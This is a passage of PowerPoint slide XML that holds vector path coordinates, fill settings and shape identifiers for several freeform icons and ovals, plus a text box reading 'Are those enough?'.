                  <a:cubicBezTo>
                    <a:pt x="113" y="215"/>
                    <a:pt x="114" y="204"/>
                    <a:pt x="119" y="196"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="161" y="184"/>
                    <a:pt x="192" y="145"/>
                    <a:pt x="192" y="100"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="192" y="44"/>
                    <a:pt x="147" y="0"/>
                    <a:pt x="92" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="54" y="0"/>
                    <a:pt x="20" y="21"/>
                    <a:pt x="4" y="52"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5" y="52"/>
                    <a:pt x="6" y="52"/>
                    <a:pt x="7" y="52"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10" y="52"/>
                    <a:pt x="15" y="53"/>
                    <a:pt x="24" y="54"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="36" y="56"/>
                    <a:pt x="53" y="58"/>
                    <a:pt x="64" y="58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74" y="58"/>
                    <a:pt x="91" y="56"/>
                    <a:pt x="103" y="54"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="112" y="53"/>
                    <a:pt x="118" y="52"/>
                    <a:pt x="120" y="52"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="135" y="52"/>
                    <a:pt x="170" y="55"/>
                    <a:pt x="174" y="75"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="180" y="101"/>
                    <a:pt x="167" y="124"/>
                    <a:pt x="157" y="133"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="150" y="139"/>
                    <a:pt x="134" y="141"/>
                    <a:pt x="122" y="141"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="113" y="141"/>
                    <a:pt x="95" y="140"/>
                    <a:pt x="86" y="133"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="75" y="124"/>
                    <a:pt x="65" y="100"/>
                    <a:pt x="64" y="83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3" y="83"/>
                    <a:pt x="63" y="83"/>
                    <a:pt x="63" y="83"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="62" y="100"/>
                    <a:pt x="52" y="124"/>
                    <a:pt x="41" y="133"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="33" y="140"/>
                    <a:pt x="15" y="141"/>
                    <a:pt x="5" y="141"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3" y="141"/>
                    <a:pt x="2" y="141"/>
                    <a:pt x="0" y="141"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="167"/>
                    <a:pt x="35" y="187"/>
                    <a:pt x="62" y="195"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="72" y="207"/>
                    <a:pt x="66" y="215"/>
                    <a:pt x="55" y="218"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="45" y="220"/>
                    <a:pt x="38" y="222"/>
                    <a:pt x="33" y="224"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="40" y="226"/>
                    <a:pt x="46" y="230"/>
                    <a:pt x="50" y="235"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="52" y="234"/>
                    <a:pt x="53" y="234"/>
                    <a:pt x="55" y="234"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="57" y="234"/>
                    <a:pt x="60" y="234"/>
                    <a:pt x="63" y="237"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="68" y="243"/>
                    <a:pt x="75" y="250"/>
                    <a:pt x="77" y="258"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="77" y="259"/>
                    <a:pt x="77" y="262"/>
                    <a:pt x="77" y="263"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="78" y="263"/>
                    <a:pt x="91" y="260"/>
                    <a:pt x="95" y="259"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="97" y="258"/>
                    <a:pt x="100" y="255"/>
                    <a:pt x="101" y="252"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="102" y="251"/>
                    <a:pt x="104" y="250"/>
                    <a:pt x="105" y="248"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="110" y="242"/>
                    <a:pt x="120" y="239"/>
                    <a:pt x="127" y="236"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="128" y="236"/>
                    <a:pt x="130" y="236"/>
                    <a:pt x="131" y="236"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="134" y="236"/>
                    <a:pt x="137" y="237"/>
                    <a:pt x="138" y="239"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="138" y="240"/>
                    <a:pt x="138" y="240"/>
                    <a:pt x="138" y="241"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="136" y="249"/>
                    <a:pt x="138" y="261"/>
                    <a:pt x="139" y="268"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="139" y="268"/>
                    <a:pt x="139" y="268"/>
                    <a:pt x="139" y="269"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="140" y="270"/>
                    <a:pt x="140" y="272"/>
                    <a:pt x="139" y="273"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="139" y="274"/>
                    <a:pt x="139" y="275"/>
                    <a:pt x="138" y="275"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="138" y="275"/>
                    <a:pt x="138" y="275"/>
                    <a:pt x="138" y="275"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="136" y="278"/>
                    <a:pt x="132" y="281"/>
                    <a:pt x="126" y="285"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="120" y="289"/>
                    <a:pt x="112" y="292"/>
                    <a:pt x="109" y="293"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="104" y="295"/>
                    <a:pt x="100" y="296"/>
                    <a:pt x="95" y="298"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="120" y="307"/>
                    <a:pt x="151" y="316"/>
                    <a:pt x="159" y="310"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="168" y="303"/>
                    <a:pt x="172" y="295"/>
                    <a:pt x="175" y="276"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="178" y="260"/>
                    <a:pt x="177" y="242"/>
                    <a:pt x="162" y="230"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="BDC3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5" tIns="22857" rIns="45715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851">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F65CF532-9CB3-2448-9A63-40E181806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1606" y="4854176"/>
              <a:ext cx="753711" cy="459710"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 36 w 70"/>
                <a:gd name="T1" fmla="*/ 43 h 43"/>
                <a:gd name="T2" fmla="*/ 57 w 70"/>
                <a:gd name="T3" fmla="*/ 41 h 43"/>
                <a:gd name="T4" fmla="*/ 66 w 70"/>
                <a:gd name="T5" fmla="*/ 6 h 43"/>
                <a:gd name="T6" fmla="*/ 34 w 70"/>
                <a:gd name="T7" fmla="*/ 0 h 43"/>
                <a:gd name="T8" fmla="*/ 0 w 70"/>
                <a:gd name="T9" fmla="*/ 6 h 43"/>
                <a:gd name="T10" fmla="*/ 14 w 70"/>
                <a:gd name="T11" fmla="*/ 40 h 43"/>
                <a:gd name="T12" fmla="*/ 36 w 70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43">
                  <a:moveTo>
                    <a:pt x="36" y="43"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="48" y="43"/>
                    <a:pt x="55" y="42"/>
                    <a:pt x="57" y="41"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="62" y="36"/>
                    <a:pt x="70" y="21"/>
                    <a:pt x="66" y="6"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="64" y="4"/>
                    <a:pt x="54" y="0"/>
                    <a:pt x="34" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="15" y="0"/>
                    <a:pt x="3" y="4"/>
                    <a:pt x="0" y="6"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="12"/>
                    <a:pt x="7" y="34"/>
                    <a:pt x="14" y="40"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="15" y="41"/>
                    <a:pt x="23" y="43"/>
                    <a:pt x="36" y="43"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="BDC3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5" tIns="22857" rIns="45715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" name="Freeform 852">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4897A6EA-90B2-E74B-A23A-BEFC2603F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4951" y="6489887"/>
              <a:ext cx="726983" cy="438328"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 7 w 68"/>
                <a:gd name="T1" fmla="*/ 29 h 41"/>
                <a:gd name="T2" fmla="*/ 25 w 68"/>
                <a:gd name="T3" fmla="*/ 30 h 41"/>
                <a:gd name="T4" fmla="*/ 8 w 68"/>
                <a:gd name="T5" fmla="*/ 31 h 41"/>
                <a:gd name="T6" fmla="*/ 4 w 68"/>
                <a:gd name="T7" fmla="*/ 34 h 41"/>
                <a:gd name="T8" fmla="*/ 7 w 68"/>
                <a:gd name="T9" fmla="*/ 40 h 41"/>
                <a:gd name="T10" fmla="*/ 10 w 68"/>
                <a:gd name="T11" fmla="*/ 39 h 41"/>
                <a:gd name="T12" fmla="*/ 11 w 68"/>
                <a:gd name="T13" fmla="*/ 39 h 41"/>
                <a:gd name="T14" fmla="*/ 11 w 68"/>
                <a:gd name="T15" fmla="*/ 38 h 41"/>
                <a:gd name="T16" fmla="*/ 16 w 68"/>
                <a:gd name="T17" fmla="*/ 37 h 41"/>
                <a:gd name="T18" fmla="*/ 18 w 68"/>
                <a:gd name="T19" fmla="*/ 37 h 41"/>
                <a:gd name="T20" fmla="*/ 28 w 68"/>
                <a:gd name="T21" fmla="*/ 40 h 41"/>
                <a:gd name="T22" fmla="*/ 36 w 68"/>
                <a:gd name="T23" fmla="*/ 41 h 41"/>
                <a:gd name="T24" fmla="*/ 36 w 68"/>
                <a:gd name="T25" fmla="*/ 41 h 41"/>
                <a:gd name="T26" fmla="*/ 68 w 68"/>
                <a:gd name="T27" fmla="*/ 36 h 41"/>
                <a:gd name="T28" fmla="*/ 67 w 68"/>
                <a:gd name="T29" fmla="*/ 31 h 41"/>
                <a:gd name="T30" fmla="*/ 54 w 68"/>
                <a:gd name="T31" fmla="*/ 14 h 41"/>
                <a:gd name="T32" fmla="*/ 48 w 68"/>
                <a:gd name="T33" fmla="*/ 18 h 41"/>
                <a:gd name="T34" fmla="*/ 55 w 68"/>
                <a:gd name="T35" fmla="*/ 28 h 41"/>
                <a:gd name="T36" fmla="*/ 43 w 68"/>
                <a:gd name="T37" fmla="*/ 12 h 41"/>
                <a:gd name="T38" fmla="*/ 26 w 68"/>
                <a:gd name="T39" fmla="*/ 2 h 41"/>
                <a:gd name="T40" fmla="*/ 24 w 68"/>
                <a:gd name="T41" fmla="*/ 9 h 41"/>
                <a:gd name="T42" fmla="*/ 39 w 68"/>
                <a:gd name="T43" fmla="*/ 20 h 41"/>
                <a:gd name="T44" fmla="*/ 20 w 68"/>
                <a:gd name="T45" fmla="*/ 10 h 41"/>
                <a:gd name="T46" fmla="*/ 9 w 68"/>
                <a:gd name="T47" fmla="*/ 11 h 41"/>
                <a:gd name="T48" fmla="*/ 11 w 68"/>
                <a:gd name="T49" fmla="*/ 18 h 41"/>
                <a:gd name="T50" fmla="*/ 31 w 68"/>
                <a:gd name="T51" fmla="*/ 25 h 41"/>
                <a:gd name="T52" fmla="*/ 11 w 68"/>
                <a:gd name="T53" fmla="*/ 20 h 41"/>
                <a:gd name="T54" fmla="*/ 3 w 68"/>
                <a:gd name="T55" fmla="*/ 23 h 41"/>
                <a:gd name="T56" fmla="*/ 7 w 68"/>
                <a:gd name="T5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8" h="41">
                  <a:moveTo>
                    <a:pt x="7" y="29"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="15" y="26"/>
                    <a:pt x="22" y="28"/>
                    <a:pt x="25" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="26" y="31"/>
                    <a:pt x="16" y="26"/>
                    <a:pt x="8" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7" y="31"/>
                    <a:pt x="4" y="33"/>
                    <a:pt x="4" y="34"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2" y="37"/>
                    <a:pt x="4" y="41"/>
                    <a:pt x="7" y="40"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8" y="40"/>
                    <a:pt x="9" y="39"/>
                    <a:pt x="10" y="39"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10" y="39"/>
                    <a:pt x="10" y="39"/>
                    <a:pt x="11" y="39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3" y="38"/>
                    <a:pt x="15" y="37"/>
                    <a:pt x="16" y="37"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="17" y="37"/>
                    <a:pt x="17" y="37"/>
                    <a:pt x="18" y="37"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="21" y="37"/>
                    <a:pt x="25" y="38"/>
                    <a:pt x="28" y="40"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="29" y="40"/>
                    <a:pt x="32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45" y="41"/>
                    <a:pt x="56" y="39"/>
                    <a:pt x="68" y="36"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="67" y="35"/>
                    <a:pt x="67" y="33"/>
                    <a:pt x="67" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="65" y="25"/>
                    <a:pt x="59" y="18"/>
                    <a:pt x="54" y="14"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="50" y="9"/>
                    <a:pt x="46" y="14"/>
                    <a:pt x="48" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="50" y="21"/>
                    <a:pt x="54" y="23"/>
                    <a:pt x="55" y="28"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="57" y="31"/>
                    <a:pt x="49" y="22"/>
                    <a:pt x="43" y="12"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="39" y="7"/>
                    <a:pt x="34" y="3"/>
                    <a:pt x="26" y="2"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="19" y="0"/>
                    <a:pt x="18" y="7"/>
                    <a:pt x="24" y="9"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="30" y="11"/>
                    <a:pt x="35" y="15"/>
                    <a:pt x="39" y="20"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="39" y="22"/>
                    <a:pt x="31" y="10"/>
                    <a:pt x="20" y="10"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="16" y="10"/>
                    <a:pt x="12" y="10"/>
                    <a:pt x="9" y="11"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5" y="14"/>
                    <a:pt x="6" y="19"/>
                    <a:pt x="11" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="20" y="17"/>
                    <a:pt x="25" y="19"/>
                    <a:pt x="31" y="25"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="33" y="27"/>
                    <a:pt x="21" y="16"/>
                    <a:pt x="11" y="20"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8" y="21"/>
                    <a:pt x="4" y="22"/>
                    <a:pt x="3" y="23"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="27"/>
                    <a:pt x="3" y="31"/>
                    <a:pt x="7" y="29"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="BDC3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5" tIns="22857" rIns="45715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Овал 119">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6ADA72C7-A8D3-E341-85BB-FAAB667E1215}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="19560611" y="3978590"/>
              <a:ext cx="2135669" cy="1941517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2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8" name="Овал 120">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{359450AD-9748-8B49-B28F-1EEF15724820}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="17450163" y="3978587"/>
              <a:ext cx="1943431" cy="1766755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2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9" name="Freeform 798">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{565F743E-0521-B04E-BDAE-211CE545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15027" y="3646099"/>
              <a:ext cx="2426839" cy="1379129"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 25 w 227"/>
                <a:gd name="T1" fmla="*/ 87 h 129"/>
                <a:gd name="T2" fmla="*/ 196 w 227"/>
                <a:gd name="T3" fmla="*/ 111 h 129"/>
                <a:gd name="T4" fmla="*/ 225 w 227"/>
                <a:gd name="T5" fmla="*/ 94 h 129"/>
                <a:gd name="T6" fmla="*/ 146 w 227"/>
                <a:gd name="T7" fmla="*/ 29 h 129"/>
                <a:gd name="T8" fmla="*/ 21 w 227"/>
                <a:gd name="T9" fmla="*/ 38 h 129"/>
                <a:gd name="T10" fmla="*/ 25 w 227"/>
                <a:gd name="T11" fmla="*/ 87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7" h="129">
                  <a:moveTo>
                    <a:pt x="25" y="87"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="49" y="68"/>
                    <a:pt x="167" y="76"/>
                    <a:pt x="196" y="111"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="211" y="129"/>
                    <a:pt x="227" y="104"/>
                    <a:pt x="225" y="94"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="220" y="71"/>
                    <a:pt x="187" y="70"/>
                    <a:pt x="146" y="29"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="117" y="0"/>
                    <a:pt x="54" y="10"/>
                    <a:pt x="21" y="38"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4" y="53"/>
                    <a:pt x="0" y="108"/>
                    <a:pt x="25" y="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45715" tIns="22857" rIns="45715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800">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{14E2A440-FE51-6244-A6CD-FAC0537D0A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79714" y="4672427"/>
              <a:ext cx="2368040" cy="823201"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 215 w 221"/>
                <a:gd name="T1" fmla="*/ 19 h 77"/>
                <a:gd name="T2" fmla="*/ 167 w 221"/>
                <a:gd name="T3" fmla="*/ 0 h 77"/>
                <a:gd name="T4" fmla="*/ 111 w 221"/>
                <a:gd name="T5" fmla="*/ 6 h 77"/>
                <a:gd name="T6" fmla="*/ 54 w 221"/>
                <a:gd name="T7" fmla="*/ 0 h 77"/>
                <a:gd name="T8" fmla="*/ 6 w 221"/>
                <a:gd name="T9" fmla="*/ 19 h 77"/>
                <a:gd name="T10" fmla="*/ 21 w 221"/>
                <a:gd name="T11" fmla="*/ 70 h 77"/>
                <a:gd name="T12" fmla="*/ 52 w 221"/>
                <a:gd name="T13" fmla="*/ 77 h 77"/>
                <a:gd name="T14" fmla="*/ 52 w 221"/>
                <a:gd name="T15" fmla="*/ 77 h 77"/>
                <a:gd name="T16" fmla="*/ 84 w 221"/>
                <a:gd name="T17" fmla="*/ 70 h 77"/>
                <a:gd name="T18" fmla="*/ 104 w 221"/>
                <a:gd name="T19" fmla="*/ 22 h 77"/>
                <a:gd name="T20" fmla="*/ 111 w 221"/>
                <a:gd name="T21" fmla="*/ 19 h 77"/>
                <a:gd name="T22" fmla="*/ 117 w 221"/>
                <a:gd name="T23" fmla="*/ 22 h 77"/>
                <a:gd name="T24" fmla="*/ 137 w 221"/>
                <a:gd name="T25" fmla="*/ 70 h 77"/>
                <a:gd name="T26" fmla="*/ 169 w 221"/>
                <a:gd name="T27" fmla="*/ 77 h 77"/>
                <a:gd name="T28" fmla="*/ 200 w 221"/>
                <a:gd name="T29" fmla="*/ 70 h 77"/>
                <a:gd name="T30" fmla="*/ 215 w 221"/>
                <a:gd name="T31" fmla="*/ 19 h 77"/>
                <a:gd name="T32" fmla="*/ 78 w 221"/>
                <a:gd name="T33" fmla="*/ 62 h 77"/>
                <a:gd name="T34" fmla="*/ 52 w 221"/>
                <a:gd name="T35" fmla="*/ 66 h 77"/>
                <a:gd name="T36" fmla="*/ 28 w 221"/>
                <a:gd name="T37" fmla="*/ 62 h 77"/>
                <a:gd name="T38" fmla="*/ 16 w 221"/>
                <a:gd name="T39" fmla="*/ 21 h 77"/>
                <a:gd name="T40" fmla="*/ 54 w 221"/>
                <a:gd name="T41" fmla="*/ 11 h 77"/>
                <a:gd name="T42" fmla="*/ 93 w 221"/>
                <a:gd name="T43" fmla="*/ 20 h 77"/>
                <a:gd name="T44" fmla="*/ 78 w 221"/>
                <a:gd name="T45" fmla="*/ 62 h 77"/>
                <a:gd name="T46" fmla="*/ 193 w 221"/>
                <a:gd name="T47" fmla="*/ 62 h 77"/>
                <a:gd name="T48" fmla="*/ 169 w 221"/>
                <a:gd name="T49" fmla="*/ 66 h 77"/>
                <a:gd name="T50" fmla="*/ 144 w 221"/>
                <a:gd name="T51" fmla="*/ 62 h 77"/>
                <a:gd name="T52" fmla="*/ 128 w 221"/>
                <a:gd name="T53" fmla="*/ 20 h 77"/>
                <a:gd name="T54" fmla="*/ 167 w 221"/>
                <a:gd name="T55" fmla="*/ 11 h 77"/>
                <a:gd name="T56" fmla="*/ 205 w 221"/>
                <a:gd name="T57" fmla="*/ 21 h 77"/>
                <a:gd name="T58" fmla="*/ 193 w 221"/>
                <a:gd name="T59" fmla="*/ 6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1" h="77">
                  <a:moveTo>
                    <a:pt x="215" y="19"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="212" y="2"/>
                    <a:pt x="178" y="0"/>
                    <a:pt x="167" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="161" y="0"/>
                    <a:pt x="127" y="6"/>
                    <a:pt x="111" y="6"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="93" y="6"/>
                    <a:pt x="60" y="0"/>
                    <a:pt x="54" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="44" y="0"/>
                    <a:pt x="10" y="2"/>
                    <a:pt x="6" y="19"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="42"/>
                    <a:pt x="12" y="63"/>
                    <a:pt x="21" y="70"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="27" y="76"/>
                    <a:pt x="45" y="77"/>
                    <a:pt x="52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7" y="77"/>
                    <a:pt x="77" y="76"/>
                    <a:pt x="84" y="70"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="94" y="62"/>
                    <a:pt x="105" y="37"/>
                    <a:pt x="104" y="22"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="106" y="20"/>
                    <a:pt x="108" y="19"/>
                    <a:pt x="111" y="19"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="113" y="19"/>
                    <a:pt x="115" y="20"/>
                    <a:pt x="117" y="22"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="116" y="36"/>
                    <a:pt x="127" y="62"/>
                    <a:pt x="137" y="70"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="144" y="76"/>
                    <a:pt x="164" y="77"/>
                    <a:pt x="169" y="77"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="177" y="77"/>
                    <a:pt x="194" y="76"/>
                    <a:pt x="200" y="70"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="209" y="63"/>
                    <a:pt x="221" y="42"/>
                    <a:pt x="215" y="19"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="78" y="62"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="75" y="64"/>
                    <a:pt x="65" y="66"/>
                    <a:pt x="52" y="66"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="38" y="66"/>
                    <a:pt x="30" y="64"/>
                    <a:pt x="28" y="62"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="21" y="56"/>
                    <a:pt x="12" y="39"/>
                    <a:pt x="16" y="21"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="17" y="16"/>
                    <a:pt x="32" y="11"/>
                    <a:pt x="54" y="11"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="76" y="11"/>
                    <a:pt x="92" y="16"/>
                    <a:pt x="93" y="20"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="96" y="28"/>
                    <a:pt x="87" y="54"/>
                    <a:pt x="78" y="62"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="193" y="62"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="192" y="64"/>
                    <a:pt x="183" y="66"/>
                    <a:pt x="169" y="66"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="156" y="66"/>
                    <a:pt x="146" y="64"/>
                    <a:pt x="144" y="62"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="134" y="54"/>
                    <a:pt x="125" y="28"/>
                    <a:pt x="128" y="20"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="129" y="16"/>
                    <a:pt x="145" y="11"/>
                    <a:pt x="167" y="11"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="189" y="11"/>
                    <a:pt x="204" y="16"/>
                    <a:pt x="205" y="21"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="209" y="39"/>
                    <a:pt x="200" y="56"/>
                    <a:pt x="193" y="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45715" tIns="22857" rIns="45715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F1506C2-1C05-EB47-8B67-539043292DE4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1134604" y="2789958"/>
            <a:ext cx="597311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Are those enough?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4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sz="4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029774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5272B2-C70D-EA45-8D51-6C870D16C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365" y="2083812"/>
            <a:ext cx="2499930" cy="54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7B2F12-8FBE-A946-AF96-2381B44A1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192" y="2217669"/>
            <a:ext cx="1031497" cy="10314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BD50BF-C4DC-6949-AE39-CB0931029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9264" y="1950984"/>
            <a:ext cx="1523868" cy="12030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A9887A-30F9-ED46-91D6-DCCEC6EBBE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9264" y="3727304"/>
            <a:ext cx="2597727" cy="952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78BC0C-0F87-BA43-A715-6DAADE7B3A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9995" y="1964239"/>
            <a:ext cx="893351" cy="14255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0EDC2E-0B4D-7F4C-AE3D-E2F89D52AB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5345" y="5217335"/>
            <a:ext cx="1063919" cy="10639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775CD7-0CA9-764E-9270-AF3953FEE9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535" y="5645434"/>
